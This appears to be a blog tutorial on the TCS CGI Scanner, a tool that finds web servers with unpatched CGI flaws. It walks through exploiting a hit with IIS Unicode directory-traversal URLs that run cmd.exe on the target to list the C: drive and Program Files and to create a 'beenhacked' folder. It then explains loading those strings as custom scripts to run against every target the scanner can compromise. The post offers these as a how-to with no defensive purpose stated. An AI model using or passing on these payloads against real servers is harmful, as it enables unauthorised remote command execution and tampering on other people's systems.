The TCS Common Gateway Interface (CGI) Scanner application is designed to find targets that have vulnerable CGI Script errors. These errors are normally due to systems that have not been patched or updated.
Click to highlight the default target of htpp://www.tpp.ru and click on the at the top left of the application to delete the current target.
On the gray bar along the top left of the application, enter the IP address or hostname of the target and click on the gray-colored arrow to insert the new target. Repeat this process for multiple targets. The TCS CGI Scanner is now ready to scan the target.
In this example, each script run against the target is displayed with the result to the right. The ones of interest are any with a 200 as this indicates a successful attempt.To execute, right-click on a script and left-click on Copy String. Open Internet Explorer and paste the line in the address bar. Press the Enter key. The directory listing of the target’s C: drive will appear.
The line that should be in the address bar is:
http://172.16.1.40/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
To list the contents of the Program Files directory, edit the address bar to
http://172.16.1.40/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\progra~1
Create directory command within the script:
http://172.16.1.40/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+md+c:\beenhacked
Notice that the beenhacked directory is now created in the root of the C: drive on the target.
The gray bar along the top right of the application allows you to enter custom scripts for the application to check against the target. If you wanted to check the Program Files directory or create a beenhacked directory on each target it is capable of compromising, you could enter these scripts here and click the downward-pointing arrow to enter the script into the application. Repeat this process for multiple targets.If you like this post and want us to post similar articles, Pls give us a feedback and leave a comment here.
No comments:
Post a Comment